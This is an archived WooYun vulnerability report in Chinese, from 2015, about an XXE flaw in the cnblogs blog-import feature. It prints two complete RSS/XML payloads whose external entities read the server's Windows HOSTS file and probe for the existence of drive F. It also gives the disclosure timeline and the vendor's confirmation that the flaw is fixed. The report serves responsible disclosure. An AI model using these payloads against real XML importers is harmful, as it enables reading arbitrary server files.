乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-03: 细节已通知厂商并且等待厂商处理中 2015-05-04: 厂商已经确认,细节仅向厂商公开 2015-05-14: 细节向核心白帽子及相关领域专家公开 2015-05-24: 细节向普通白帽子公开 2015-06-03: 细节向实习白帽子公开 2015-06-18: 细节向公众公开
博客园某处XXE,可下载任意文件
博客园提供博客搬家的功能,即可以通过导入XML添加博客。链接:http://i.cnblogs.com/Import.aspx?catid=1payload:
<?xml version="1.0" encoding="utf-8" standalone="yes"?><!DOCTYPE note [ <!ENTITY test SYSTEM "file:///C://WINDOWS/SYSTEM32/DRIVERS/ETC/HOSTS">]><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"> <channel> <title>博客园-阔爱的贝贝</title> <link>http://www.cnblogs.com/kuoaidebb/</link> <description>一枚想当黑客的程序媛</description> <language>zh-cn</language> <lastBuildDate>Sun, 03 May 2015 11:19:00 GMT</lastBuildDate> <pubDate>Sun, 03 May 2015 11:19:00 GMT</pubDate> <ttl>60</ttl> <item> <title>test]]>&test;</title> <link>http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html</link> <dc:creator>阔爱的贝贝</dc:creator> <author>阔爱的贝贝</author> <pubDate>Sun, 03 May 2015 11:13:00 GMT</pubDate> <guid>http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html</guid> <description><![CDATA[<p>]]></p>]]></description> </item> </channel></rss>
hosts文件:
验证F盘是否存在:
<?xml version="1.0" encoding="utf-8" standalone="yes"?><!DOCTYPE note [ <!ENTITY test SYSTEM "file:///F://test">]><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"> <channel> <title>博客园-阔爱的贝贝</title> <link>http://www.cnblogs.com/kuoaidebb/</link> <description>一枚想当黑客的程序媛</description> <language>zh-cn</language> <lastBuildDate>Sun, 03 May 2015 11:19:00 GMT</lastBuildDate> <pubDate>Sun, 03 May 2015 11:19:00 GMT</pubDate> <ttl>60</ttl> <item> <title>test]]>&test;</title> <link>http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html</link> <dc:creator>阔爱的贝贝</dc:creator> <author>阔爱的贝贝</author> <pubDate>Sun, 03 May 2015 11:13:00 GMT</pubDate> <guid>http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html</guid> <description><![CDATA[<p>]]></p>]]></description> </item> </channel></rss>
可下载任意文件
0.0不造0.0有木有福利的说
危害等级:中
漏洞Rank:5
确认时间:2015-05-04 19:54
谢谢您发现这个漏洞!现已修复。
暂无